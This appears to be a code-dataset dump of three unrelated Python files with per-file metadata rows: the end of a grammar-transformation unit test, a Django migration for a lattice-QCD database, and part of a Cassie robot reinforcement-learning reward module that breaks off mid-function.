self.assertEqual(fromAto1C.by_rules[0].rule, ([A], [C]))
self.assertEqual(fromAto1C.end_rule.rule, ([C], [1, C]))
class RuleNewAto0(Rule): rule = ([A], [0])
self.assertIn(RuleNewAto0, g.rules)
fromAto0 = list(filter(lambda x: hash(x) == hash(RuleNewAto0), g.rules))[0]
self.assertTrue(isclass(fromAto0))
self.assertTrue(issubclass(fromAto0, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromAto0.by_rules), 1)
self.assertEqual(fromAto0.by_rules[0].rule, ([A], [C]))
self.assertEqual(fromAto0.end_rule.rule, ([C], [0]))
class RuleNewBto3D(Rule): rule = ([B], [3, D])
self.assertIn(RuleNewBto3D, g.rules)
fromBto3D = list(filter(lambda x: hash(x) == hash(RuleNewBto3D), g.rules))[0]
self.assertTrue(isclass(fromBto3D))
self.assertTrue(issubclass(fromBto3D, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromBto3D.by_rules), 1)
self.assertEqual(fromBto3D.by_rules[0].rule, ([B], [D]))
self.assertEqual(fromBto3D.end_rule.rule, ([D], [3, D]))
class RuleNewBto2(Rule): rule = ([B], [2])
self.assertIn(RuleNewBto2, g.rules)
fromBto2 = list(filter(lambda x: hash(x) == hash(RuleNewBto2), g.rules))[0]
self.assertTrue(isclass(fromBto2))
self.assertTrue(issubclass(fromBto2, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromBto2.by_rules), 1)
self.assertEqual(fromBto2.by_rules[0].rule, ([B], [D]))
self.assertEqual(fromBto2.end_rule.rule, ([D], [2]))
if __name__ == '__main__':
main()
| 48.065 | 87 | 0.597004 | 2,302 | 19,226 | 4.942659 | 0.051694 | 0.067499 | 0.02997 | 0.035859 | 0.912199 | 0.91176 | 0.907541 | 0.895764 | 0.876077 | 0.876077 | 0 | 0.034771 | 0.222147 | 19,226 | 399 | 88 | 48.185464 | 0.726045 | 0.009518 | 0 | 0.670588 | 0 | 0 | 0.000436 | 0 | 0 | 0 | 0 | 0 | 0.588235 | 1 | 0.008824 | false | 0.014706 | 0.011765 | 0 | 0.255882 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
977ccac4b6dd07b846520fd302d4db9e4c81d0be | 6,976 | py | Python | lattedb/correlator/migrations/0003_auto_20191119_2343.py | callat-qcd/lattedb | 75c06748f3d59332a84ec1b5794c215c5974a46f | [
"BSD-3-Clause"
] | 1 | 2019-12-11T02:33:23.000Z | 2019-12-11T02:33:23.000Z | lattedb/correlator/migrations/0003_auto_20191119_2343.py | callat-qcd/lattedb | 75c06748f3d59332a84ec1b5794c215c5974a46f | [
"BSD-3-Clause"
] | 10 | 2020-01-29T17:06:01.000Z | 2021-05-31T14:41:19.000Z | lattedb/correlator/migrations/0003_auto_20191119_2343.py | callat-qcd/lattedb | 75c06748f3d59332a84ec1b5794c215c5974a46f | [
"BSD-3-Clause"
] | null | null | null | # Generated by Django 2.2.7 on 2019-11-19 23:43
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('correlator', '0002_auto_20191107_0016'),
]
operations = [
migrations.AlterField(
model_name='baryon2pt',
name='propagator0',
field=models.ForeignKey(help_text='Foreign Key to first \\(\\texttt{propagator}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='propagator.Propagator'),
),
migrations.AlterField(
model_name='baryon2pt',
name='propagator1',
field=models.ForeignKey(help_text='Foreign Key to second \\(\\texttt{propagator}\\), and must be \\(\\leq \\texttt{propagator0}\\) (also Foreign Key)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='propagator.Propagator'),
),
migrations.AlterField(
model_name='baryon2pt',
name='propagator2',
field=models.ForeignKey(help_text='Foreign Key to third \\(\\texttt{propagator}\\), and must be \\(\\leq \\texttt{propagator1}\\) (also Foreign Key)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='propagator.Propagator'),
),
migrations.AlterField(
model_name='baryon2pt',
name='sinkwave',
field=models.ForeignKey(help_text='Foreign Key to sink interpolating operator \\(\\texttt{wavefunction}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wavefunction.SCSWaveFunction'),
),
migrations.AlterField(
model_name='baryon2pt',
name='sourcewave',
field=models.ForeignKey(help_text='Foreign Key to source interpolating operator \\(\\texttt{wavefunction}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wavefunction.SCSWaveFunction'),
),
migrations.AlterField(
model_name='baryonfh3pt',
name='fhpropagator',
field=models.ForeignKey(help_text='Foreign Key pointing to Feynman-Hellmann \\(\\texttt{propagator}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='propagator.Propagator'),
),
migrations.AlterField(
model_name='baryonfh3pt',
name='propagator0',
field=models.ForeignKey(help_text='Foreign Key pointing to spectator \\(\\texttt{propagator}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='propagator.Propagator'),
),
migrations.AlterField(
model_name='baryonfh3pt',
name='propagator1',
field=models.ForeignKey(help_text='Foreign Key pointing to spectator \\(\\texttt{propagator}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='propagator.Propagator'),
),
migrations.AlterField(
model_name='baryonfh3pt',
name='sinkwave',
field=models.ForeignKey(help_text='Foreign Key pointing to sink operator \\(\\texttt{wavefunction}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wavefunction.SCSWaveFunction'),
),
migrations.AlterField(
model_name='baryonfh3pt',
name='sourcewave',
field=models.ForeignKey(help_text='Foreign Key pointing to source operator \\(\\texttt{wavefunction}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wavefunction.SCSWaveFunction'),
),
migrations.AlterField(
model_name='baryonseq3pt',
name='current',
field=models.ForeignKey(help_text='Foreign Key to current interaction operator \\(\\texttt{wavefunction}\\)', on_delete=django.db.models.deletion.CASCADE, to='current.Current'),
),
migrations.AlterField(
model_name='baryonseq3pt',
name='propagator',
field=models.ForeignKey(help_text='Foreign Key pointing to daughter quark \\(\\texttt{propagator}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='propagator.Propagator'),
),
migrations.AlterField(
model_name='baryonseq3pt',
name='seqpropagator',
field=models.ForeignKey(help_text='Foreign Key pointing to sequential \\(\\texttt{propagator}\\) (2 spectator quarks + 1 daughter)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='propagator.Propagator'),
),
migrations.AlterField(
model_name='baryonseq3pt',
name='sourcewave',
field=models.ForeignKey(help_text='Foreign Key pointing to source operator \\(\\texttt{wavefunction}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wavefunction.SCSWaveFunction'),
),
migrations.AlterField(
model_name='dwftuning',
name='propagator',
field=models.ForeignKey(help_text='Foreign Key to \\(\\texttt{propagator}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='propagator.Propagator'),
),
migrations.AlterField(
model_name='dwftuning',
name='sink5',
field=models.BooleanField(help_text='Is the sink on the domain wall?'),
),
migrations.AlterField(
model_name='dwftuning',
name='wave',
field=models.ForeignKey(help_text='Foreign Key to source spin color space \\(\\texttt{wavefunction}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wavefunction.SCSWaveFunction'),
),
migrations.AlterField(
model_name='meson2pt',
name='propagator0',
field=models.ForeignKey(help_text='Foreign Key to first \\(\\texttt{propagator}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='propagator.Propagator'),
),
migrations.AlterField(
model_name='meson2pt',
name='propagator1',
field=models.ForeignKey(help_text='Foreign Key to second \\(\\texttt{propagator}\\), and must be \\(\\leq \\texttt{propagator0}\\) (also Foreign Key)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='propagator.Propagator'),
),
migrations.AlterField(
model_name='meson2pt',
name='sinkwave',
field=models.ForeignKey(help_text='Foreign Key to sink interpolating operator \\(\\texttt{wavefunction}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wavefunction.SCSWaveFunction'),
),
migrations.AlterField(
model_name='meson2pt',
name='sourcewave',
field=models.ForeignKey(help_text='Foreign Key to source interpolating operator \\(\\texttt{wavefunction}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wavefunction.SCSWaveFunction'),
),
]
| 58.133333 | 255 | 0.646502 | 708 | 6,976 | 6.251412 | 0.124294 | 0.051966 | 0.066426 | 0.104383 | 0.901717 | 0.901717 | 0.86376 | 0.856078 | 0.837099 | 0.76028 | 0 | 0.011224 | 0.208142 | 6,976 | 119 | 256 | 58.621849 | 0.790007 | 0.006451 | 0 | 0.79646 | 1 | 0.026549 | 0.348391 | 0.157454 | 0.168142 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.017699 | 0 | 0.044248 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
97afd6a5b0a5ad111c807fc321b3b986cfc81f36 | 25,068 | py | Python | cassie/misc/rewards/clock_rewards.py | WooQi57/cassie-run | 9aac12e3a69a011735540d9f5711b8f06da9af81 | [
"MIT"
] | 36 | 2019-10-01T22:50:12.000Z | 2022-02-09T06:17:16.000Z | cassie/misc/rewards/clock_rewards.py | WooQi57/cassie-run | 9aac12e3a69a011735540d9f5711b8f06da9af81 | [
"MIT"
] | 5 | 2019-11-26T02:35:39.000Z | 2020-11-29T23:20:48.000Z | cassie/misc/rewards/clock_rewards.py | WooQi57/cassie-run | 9aac12e3a69a011735540d9f5711b8f06da9af81 | [
"MIT"
] | 24 | 2019-09-23T19:26:48.000Z | 2022-02-14T14:04:18.000Z | import numpy as np
import pickle
from cassie.trajectory.aslip_trajectory import get_ref_aslip_ext_state, get_ref_aslip_unaltered_state, get_ref_aslip_global_state
def clock_reward(self, action):
qpos = np.copy(self.sim.qpos())
qvel = np.copy(self.sim.qvel())
# These used for normalizing the foot forces and velocities
desired_max_foot_frc = 250
desired_max_foot_vel = 2.0
orient_targ = np.array([1, 0, 0, 0])
# state info
com_vel = qvel[0] # only care about x velocity
# put a cap on the frc and vel so as to prevent the policy from learning to maximize them during phase.
normed_left_frc = min(self.l_foot_frc, desired_max_foot_frc) / desired_max_foot_frc
normed_right_frc = min(self.r_foot_frc, desired_max_foot_frc) / desired_max_foot_frc
normed_left_vel = min(np.linalg.norm(self.l_foot_vel), desired_max_foot_vel) / desired_max_foot_vel
normed_right_vel = min(np.linalg.norm(self.r_foot_vel), desired_max_foot_vel) / desired_max_foot_vel
com_orient_error = 0
foot_orient_error = 0
com_vel_error = 0
straight_diff = 0
foot_vel_error = 0
foot_frc_error = 0
# com orient error
com_orient_error += 10 * (1 - np.inner(orient_targ, qpos[3:7]) ** 2)
# foot orient error
foot_orient_error += 10 * (self.l_foot_orient_cost + self.r_foot_orient_cost)
# com vel error
com_vel_error += np.linalg.norm(com_vel - self.speed)
# pelvis motion penalty : straight_diff, height deadzone, pelvis acceleration penalty
straight_diff = np.abs(qpos[1]) # straight difference penalty
if straight_diff < 0.05:
straight_diff = 0
height_diff = np.abs(qpos[2] - 0.9) # height deadzone is range from 0.05 to 0.2 meters depending on speed
deadzone_size = 0.05 + 0.05 * self.speed
if height_diff < deadzone_size:
height_diff = 0
pelvis_acc = 0.25 * (np.abs(self.cassie_state.pelvis.rotationalVelocity[:]).sum() + np.abs(self.cassie_state.pelvis.translationalAcceleration[:]).sum())
pelvis_motion = straight_diff + height_diff + pelvis_acc
# force/vel clock errors
# These values represent if we want to allow foot foot forces / vels (1 -> good if forces/vels exist), or (-1 -> bad if forces/vels exist)
left_frc_clock = self.left_clock[0](self.phase)
right_frc_clock = self.right_clock[0](self.phase)
left_vel_clock = self.left_clock[1](self.phase)
right_vel_clock = self.right_clock[1](self.phase)
# scaled force/vel reward
# left_frc_score = np.tanh(left_frc_clock * normed_left_frc)
# left_vel_score = np.tanh(left_vel_clock * normed_left_vel)
# right_frc_score = np.tanh(right_frc_clock * normed_right_frc)
# right_vel_score = np.tanh(right_vel_clock * normed_right_vel)
left_frc_score = np.tan(np.pi/4 * left_frc_clock * normed_left_frc)
left_vel_score = np.tan(np.pi/4 * left_vel_clock * normed_left_vel)
right_frc_score = np.tan(np.pi/4 * right_frc_clock * normed_right_frc)
right_vel_score = np.tan(np.pi/4 * right_vel_clock * normed_right_vel)
foot_frc_score = left_frc_score + right_frc_score
foot_vel_score = left_vel_score + right_vel_score
# hip roll velocity penalty
hip_roll_penalty = np.abs(qvel[6]) + np.abs(qvel[13])
# torque cost
torque = np.asarray(self.cassie_state.motor.torque[:])
torque_penalty = 0.25 * (sum(np.abs(self.prev_torque - torque)) / len(torque))
# action cost
action_penalty = 5 * sum(np.abs(self.prev_action - action)) / len(action)
reward = 0.200 * foot_frc_score + \
0.200 * foot_vel_score + \
0.200 * np.exp(-(com_orient_error + foot_orient_error)) + \
0.150 * np.exp(-pelvis_motion) + \
0.150 * np.exp(-com_vel_error) + \
0.050 * np.exp(-hip_roll_penalty) + \
0.025 * np.exp(-torque_penalty) + \
0.025 * np.exp(-action_penalty)
if self.debug:
print("l_frc phase : {:.2f}\t l_frc applied : {:.2f}\t l_frc_score: {:.2f}\t t_frc_score: {:.2f}".format(left_frc_clock, normed_left_frc, left_frc_score, foot_frc_score))
print("l_vel phase : {:.2f}\t l_vel applied : {:.2f}\t l_vel_score: {:.2f}\t t_vel_score: {:.2f}".format(left_vel_clock, normed_left_vel, left_vel_score, foot_vel_score))
# print("r_frc phase : {:.2f}\t r_frc applied : {:.2f}\t r_penalty: {:.2f}\t t_penalty: {:.2f}".format(right_frc_clock, normed_right_frc, right_frc_penalty, foot_frc_penalty))
# print("r_vel phase : {:.2f}\t r_vel applied : {:.2f}\t r_penalty: {:.2f}\t t_penalty: {:.2f}".format(right_vel_clock, normed_right_vel, right_vel_penalty, foot_vel_penalty))\
print(
f"reward: \t{reward:.2f} / 1.000\n"
f"foot_frc:\t{0.200 * foot_frc_score:.2f} / +-0.200\n"
f"foot_vel:\t{0.200 * foot_vel_score:.2f} / +-0.200\n"
f"orient: \t{0.200 * np.exp(-(com_orient_error + foot_orient_error)):.2f} / 0.200\n"
f"pelvis: \t{0.150 * np.exp(-pelvis_motion):.2f} / 0.150\n"
f"com_vel: \t{0.150 * np.exp(-com_vel_error):.2f} / 0.150\n"
f"hip_roll:\t{0.050 * np.exp(-hip_roll_penalty):.2f} / 0.050\n"
f"torque: \t{0.025 * np.exp(-torque_penalty):.2f} / 0.025\n"
f"action: \t{0.025 * np.exp(-action_penalty):.2f} / 0.025"
)
print("actual speed: {}\tcommanded speed: {}\n\n".format(qvel[0], self.speed))
return reward
"""
Designed to speed up early parts of training, prevent bobbing in place local minima.
Changes to clock_reward:
- no pelvis acc
- much less weighting / less strict on torque, action, hip roll penalty, foot orient, com orient
- much more weighting on force/vel clock, com vel. Higher range on normalization of foot force/vel
"""
def early_clock_reward(self, action):
qpos = np.copy(self.sim.qpos())
qvel = np.copy(self.sim.qvel())
# These used for normalizing the foot forces and velocities
desired_max_foot_frc = 350
desired_max_foot_vel = 3.0
orient_targ = np.array([1, 0, 0, 0])
# state info
com_vel = qvel[0] # only care about x velocity
# put a cap on the frc and vel so as to prevent the policy from learning to maximize them during phase.
normed_left_frc = min(self.l_foot_frc, desired_max_foot_frc) / desired_max_foot_frc
normed_right_frc = min(self.r_foot_frc, desired_max_foot_frc) / desired_max_foot_frc
normed_left_vel = min(np.linalg.norm(self.l_foot_vel), desired_max_foot_vel) / desired_max_foot_vel
normed_right_vel = min(np.linalg.norm(self.r_foot_vel), desired_max_foot_vel) / desired_max_foot_vel
com_orient_error = 0
foot_orient_error = 0
com_vel_error = 0
straight_diff = 0
foot_vel_error = 0
foot_frc_error = 0
# com orient error
com_orient_error += 1 * (1 - np.inner(orient_targ, qpos[3:7]) ** 2)
# foot orient error
foot_orient_error += 1 * (self.l_foot_orient_cost + self.r_foot_orient_cost)
# com vel error
com_vel_error += np.linalg.norm(self.speed - com_vel)
# pelvis motion penalty : straight_diff, height deadzone, pelvis acceleration penalty
straight_diff = np.abs(qpos[1]) # straight difference penalty
if straight_diff < 0.05:
straight_diff = 0
height_diff = np.abs(qpos[2] - 0.9) # height deadzone is range from 0.05 to 0.2 meters depending on speed
deadzone_size = 0.05 + 0.05 * self.speed
if height_diff < deadzone_size:
height_diff = 0
# pelvis_acc = 0.25 * (np.abs(self.cassie_state.pelvis.rotationalVelocity[:]).sum() + np.abs(self.cassie_state.pelvis.translationalAcceleration[:]).sum())
pelvis_motion = straight_diff + height_diff
# force/vel clock errors
# These values represent if we want to allow foot foot forces / vels (1 -> good if forces/vels exist), or (-1 -> bad if forces/vels exist)
left_frc_clock = self.left_clock[0](self.phase)
right_frc_clock = self.right_clock[0](self.phase)
left_vel_clock = self.left_clock[1](self.phase)
right_vel_clock = self.right_clock[1](self.phase)
# scaled force/vel reward
left_frc_score = np.tanh(left_frc_clock * normed_left_frc)
left_vel_score = np.tanh(left_vel_clock * normed_left_vel)
right_frc_score = np.tanh(right_frc_clock * normed_right_frc)
right_vel_score = np.tanh(right_vel_clock * normed_right_vel)
# left_frc_score = np.tan(np.pi/4 * left_frc_clock * normed_left_frc)
# left_vel_score = np.tan(np.pi/4 * left_vel_clock * normed_left_vel)
# right_frc_score = np.tan(np.pi/4 * right_frc_clock * normed_right_frc)
# right_vel_score = np.tan(np.pi/4 * right_vel_clock * normed_right_vel)
foot_frc_score = left_frc_score + right_frc_score
foot_vel_score = left_vel_score + right_vel_score
# hip roll velocity penalty
hip_roll_penalty = np.abs(qvel[6]) + np.abs(qvel[13])
# torque cost
torque = np.asarray(self.cassie_state.motor.torque[:])
torque_penalty = 0.25 * (sum(np.abs(self.prev_torque - torque)) / len(torque))
# action cost
action_penalty = 5 * sum(np.abs(self.prev_action - action)) / len(action)
reward = 0.250 * foot_frc_score + \
0.350 * foot_vel_score + \
0.200 * np.exp(-com_vel_error) + \
0.100 * np.exp(-(com_orient_error + foot_orient_error)) + \
0.100 * np.exp(-pelvis_motion)
# 0.050 * np.exp(-hip_roll_penalty) + \
# 0.025 * np.exp(-torque_penalty) + \
# 0.025 * np.exp(-action_penalty)
if self.debug:
print("l_frc phase : {:.2f}\t l_frc applied : {:.2f}\t l_frc_score: {:.2f}\t t_frc_score: {:.2f}".format(left_frc_clock, normed_left_frc, left_frc_score, foot_frc_score))
print("l_vel phase : {:.2f}\t l_vel applied : {:.2f}\t l_vel_score: {:.2f}\t t_vel_score: {:.2f}".format(left_vel_clock, normed_left_vel, left_vel_score, foot_vel_score))
# print("r_frc phase : {:.2f}\t r_frc applied : {:.2f}\t r_penalty: {:.2f}\t t_penalty: {:.2f}".format(right_frc_clock, normed_right_frc, right_frc_penalty, foot_frc_penalty))
# print("r_vel phase : {:.2f}\t r_vel applied : {:.2f}\t r_penalty: {:.2f}\t t_penalty: {:.2f}".format(right_vel_clock, normed_right_vel, right_vel_penalty, foot_vel_penalty))\
print(
f"reward: \t{reward:.2f} / 1.000\n"
f"foot_frc:\t{0.250 * foot_frc_score:.2f} / +-0.250\n"
f"foot_vel:\t{0.250 * foot_vel_score:.2f} / +-0.250\n"
f"com_vel: \t{0.200 * np.exp(-com_vel_error):.2f} / 0.200\n"
f"orient: \t{0.150 * np.exp(-(com_orient_error + foot_orient_error)):.2f} / 0.150\n"
f"pelvis: \t{0.150 * np.exp(-pelvis_motion):.2f} / 0.150\n"
# f"hip_roll:\t{0.050 * np.exp(-hip_roll_penalty):.2f} / 0.050\n"
# f"torque: \t{0.025 * np.exp(-torque_penalty):.2f} / 0.025\n"
# f"action: \t{0.025 * np.exp(-action_penalty):.2f} / 0.025"
)
print("actual speed: {}\tcommanded speed: {}\n\n".format(qvel[0], self.speed))
return reward
def no_speed_clock_reward(self, action):
qpos = np.copy(self.sim.qpos())
qvel = np.copy(self.sim.qvel())
# These used for normalizing the foot forces and velocities
desired_max_foot_frc = 250
desired_max_foot_vel = 3.0
orient_targ = np.array([1, 0, 0, 0])
# state info
com_vel = qvel[0] # only care about x velocity
# put a cap on the frc and vel so as to prevent the policy from learning to maximize them during phase.
normed_left_frc = min(self.l_foot_frc, desired_max_foot_frc) / desired_max_foot_frc
normed_right_frc = min(self.r_foot_frc, desired_max_foot_frc) / desired_max_foot_frc
normed_left_vel = min(np.linalg.norm(self.l_foot_vel), desired_max_foot_vel) / desired_max_foot_vel
normed_right_vel = min(np.linalg.norm(self.r_foot_vel), desired_max_foot_vel) / desired_max_foot_vel
com_orient_error = 0
foot_orient_error = 0
com_vel_error = 0
straight_diff = 0
foot_vel_error = 0
foot_frc_error = 0
# com orient error
com_orient_error += 10 * (1 - np.inner(orient_targ, qpos[3:7]) ** 2)
# foot orient error
foot_orient_error += 10 * (self.l_foot_orient_cost + self.r_foot_orient_cost)
# com vel error
com_vel_error += np.linalg.norm(com_vel - self.speed)
# pelvis motion penalty : straight_diff, height deadzone, pelvis acceleration penalty
straight_diff = np.abs(qpos[1]) # straight difference penalty
if straight_diff < 0.05:
straight_diff = 0
height_diff = np.abs(qpos[2] - 0.9) # height deadzone is range from 0.05 to 0.2 meters depending on speed
deadzone_size = 0.05 + 0.05 * self.speed
if height_diff < deadzone_size:
height_diff = 0
pelvis_acc = 0.25 * (np.abs(self.cassie_state.pelvis.rotationalVelocity[:]).sum() + np.abs(self.cassie_state.pelvis.translationalAcceleration[:]).sum())
pelvis_motion = straight_diff + height_diff + pelvis_acc
# force/vel clock errors
# These values represent if we want to allow foot foot forces / vels (1 -> good if forces/vels exist), or (-1 -> bad if forces/vels exist)
left_frc_clock = self.left_clock[0](self.phase)
right_frc_clock = self.right_clock[0](self.phase)
left_vel_clock = self.left_clock[1](self.phase)
right_vel_clock = self.right_clock[1](self.phase)
# scaled force/vel reward
# left_frc_score = np.tanh(left_frc_clock * normed_left_frc)
# left_vel_score = np.tanh(left_vel_clock * normed_left_vel)
# right_frc_score = np.tanh(right_frc_clock * normed_right_frc)
# right_vel_score = np.tanh(right_vel_clock * normed_right_vel)
left_frc_score = np.tan(np.pi/4 * left_frc_clock * normed_left_frc)
left_vel_score = np.tan(np.pi/4 * left_vel_clock * normed_left_vel)
right_frc_score = np.tan(np.pi/4 * right_frc_clock * normed_right_frc)
right_vel_score = np.tan(np.pi/4 * right_vel_clock * normed_right_vel)
foot_frc_score = left_frc_score + right_frc_score
foot_vel_score = left_vel_score + right_vel_score
# hip roll velocity penalty
hip_roll_penalty = np.abs(qvel[6]) + np.abs(qvel[13])
# torque cost
torque = np.asarray(self.cassie_state.motor.torque[:])
torque_penalty = 0.25 * (sum(np.abs(self.prev_torque - torque)) / len(torque))
# action cost
action_penalty = 5 * sum(np.abs(self.prev_action - action)) / len(action)
reward = 0.250 * foot_frc_score + \
0.250 * foot_vel_score + \
0.225 * np.exp(-(com_orient_error + foot_orient_error)) + \
0.175 * np.exp(-pelvis_motion) + \
0.050 * np.exp(-hip_roll_penalty) + \
0.025 * np.exp(-torque_penalty) + \
0.025 * np.exp(-action_penalty)
if self.debug:
print("l_frc phase : {:.2f}\t l_frc applied : {:.2f}\t l_frc_score: {:.2f}\t t_frc_score: {:.2f}".format(left_frc_clock, normed_left_frc, left_frc_score, foot_frc_score))
print("l_vel phase : {:.2f}\t l_vel applied : {:.2f}\t l_vel_score: {:.2f}\t t_vel_score: {:.2f}".format(left_vel_clock, normed_left_vel, left_vel_score, foot_vel_score))
# print("r_frc phase : {:.2f}\t r_frc applied : {:.2f}\t r_penalty: {:.2f}\t t_penalty: {:.2f}".format(right_frc_clock, normed_right_frc, right_frc_penalty, foot_frc_penalty))
# print("r_vel phase : {:.2f}\t r_vel applied : {:.2f}\t r_penalty: {:.2f}\t t_penalty: {:.2f}".format(right_vel_clock, normed_right_vel, right_vel_penalty, foot_vel_penalty))\
print(
f"reward: \t{reward:.2f} / 1.000\n"
f"foot_frc:\t{0.200 * foot_frc_score:.2f} / +-0.200\n"
f"foot_vel:\t{0.200 * foot_vel_score:.2f} / +-0.200\n"
f"orient: \t{0.200 * np.exp(-(com_orient_error + foot_orient_error)):.2f} / 0.200\n"
f"pelvis: \t{0.150 * np.exp(-pelvis_motion):.2f} / 0.150\n"
f"hip_roll:\t{0.050 * np.exp(-hip_roll_penalty):.2f} / 0.050\n"
f"torque: \t{0.025 * np.exp(-torque_penalty):.2f} / 0.025\n"
f"action: \t{0.025 * np.exp(-action_penalty):.2f} / 0.025"
)
print("actual speed: {}\tcommanded speed: {}\n\n".format(qvel[0], self.speed))
return reward
def aslip_clock_reward(self, action):
qpos = np.copy(self.sim.qpos())
qvel = np.copy(self.sim.qvel())
# These used for normalizing the foot forces and velocities
desired_max_foot_frc = 400
desired_max_foot_vel = 3.0
orient_targ = np.array([1, 0, 0, 0])
# state info
com_vel = qvel[0] # only care about x velocity
# put a cap on the frc and vel so as to prevent the policy from learning to maximize them during phase.
normed_left_frc = min(self.l_foot_frc, desired_max_foot_frc) / desired_max_foot_frc
normed_right_frc = min(self.r_foot_frc, desired_max_foot_frc) / desired_max_foot_frc
normed_left_vel = min(np.linalg.norm(self.l_foot_vel), desired_max_foot_vel) / desired_max_foot_vel
normed_right_vel = min(np.linalg.norm(self.r_foot_vel), desired_max_foot_vel) / desired_max_foot_vel
com_orient_error = 0
foot_orient_error = 0
com_vel_error = 0
straight_diff = 0
foot_vel_error = 0
foot_frc_error = 0
# com orient error
com_orient_error += 10 * (1 - np.inner(orient_targ, qpos[3:7]) ** 2)
# foot orient error
# foot_orient_error += 10 * (self.l_foot_orient_cost + self.r_foot_orient_cost)
target_q = [1, 0, 0, 0]
left_actual = self.cassie_state.leftFoot.orientation
right_actual = self.cassie_state.rightFoot.orientation
foot_orient_error = 10 * ((1 - np.inner(left_actual, target_q) ** 2) + (1 - np.inner(right_actual, target_q) ** 2))
# com vel error
com_vel_error += np.linalg.norm(com_vel - self.speed)
# straight difference penalty
straight_diff = np.abs(qpos[1])
if straight_diff < 0.05:
straight_diff = 0
# height deadzone is +- 0.2 meters
height_diff = np.abs(qpos[2] - 1.0)
if height_diff < 0.2:
height_diff = 0
straight_diff += height_diff
# force/vel clock errors
left_frc_clock = self.left_clock[0][0](self.phase)
right_frc_clock = self.right_clock[0][0](self.phase)
left_vel_clock = self.left_clock[0][1](self.phase)
right_vel_clock = self.right_clock[0][1](self.phase)
left_frc_score = np.tanh(left_frc_clock * normed_left_frc)
left_vel_score = np.tanh(left_vel_clock * normed_left_vel)
right_frc_score = np.tanh(right_frc_clock * normed_right_frc)
right_vel_score = np.tanh(right_vel_clock * normed_right_vel)
foot_frc_score = left_frc_score + right_frc_score
foot_vel_score = left_vel_score + right_vel_score
reward = 0.1 * np.exp(-com_orient_error) + \
0.1 * np.exp(-foot_orient_error) + \
0.2 * np.exp(-com_vel_error) + \
0.1 * np.exp(-straight_diff) + \
0.25 * foot_frc_score + \
0.25 * foot_vel_score
if self.debug:
print("l_frc phase : {:.2f}\t l_frc applied : {:.2f}\t l_frc_score: {:.2f}\t t_frc_score: {:.2f}".format(left_frc_clock, normed_left_frc, left_frc_score, foot_frc_score))
print("l_vel phase : {:.2f}\t l_vel applied : {:.2f}\t l_vel_score: {:.2f}\t t_vel_score: {:.2f}".format(left_vel_clock, normed_left_vel, left_vel_score, foot_vel_score))
# print("r_frc phase : {:.2f}\t r_frc applied : {:.2f}\t r_penalty: {:.2f}\t t_penalty: {:.2f}".format(right_frc_clock, normed_right_frc, right_frc_penalty, foot_frc_penalty))
# print("r_vel phase : {:.2f}\t r_vel applied : {:.2f}\t r_penalty: {:.2f}\t t_penalty: {:.2f}".format(right_vel_clock, normed_right_vel, right_vel_penalty, foot_vel_penalty))
print("reward: {12}\nfoot_orient:\t{0:.2f}, % = {1:.2f}\ncom_vel:\t{2:.2f}, % = {3:.2f}\nfoot_frc_score:\t{4:.2f}, % = {5:.2f}\nfoot_vel_score:\t{6:.2f}, % = {7:.2f}\nstraight_diff:\t{8:.2f}, % = {9:.2f}\ncom_orient:\t{10:.2f}, % = {11:.2f}".format(
0.1 * np.exp(-foot_orient_error), 0.1 * np.exp(-foot_orient_error) / reward * 100,
0.2 * np.exp(-com_vel_error), 0.2 * np.exp(-com_vel_error) / reward * 100,
0.25 * foot_frc_score, 0.25 * foot_frc_score / reward * 100,
0.25 * foot_vel_score, 0.25 * foot_vel_score / reward * 100,
0.1 * np.exp(-straight_diff), 0.1 * np.exp(-straight_diff) / reward * 100,
0.1 * np.exp(-com_orient_error), 0.1 * np.exp(-com_orient_error) / reward * 100,
reward
)
)
print("actual speed: {}\tcommanded speed: {}\n\n".format(np.linalg.norm(qvel[0:3]), self.speed))
return reward
def max_vel_clock_reward(self, action):
qpos = np.copy(self.sim.qpos())
qvel = np.copy(self.sim.qvel())
# These used for normalizing the foot forces and velocities
desired_max_foot_frc = 400
desired_max_foot_vel = 3.0
orient_targ = np.array([1, 0, 0, 0])
# state info
com_vel = qvel[0] # only care about x velocity
# put a cap on the frc and vel so as to prevent the policy from learning to maximize them during phase.
normed_left_frc = min(self.l_foot_frc, desired_max_foot_frc) / desired_max_foot_frc
normed_right_frc = min(self.r_foot_frc, desired_max_foot_frc) / desired_max_foot_frc
normed_left_vel = min(np.linalg.norm(self.l_foot_vel), desired_max_foot_vel) / desired_max_foot_vel
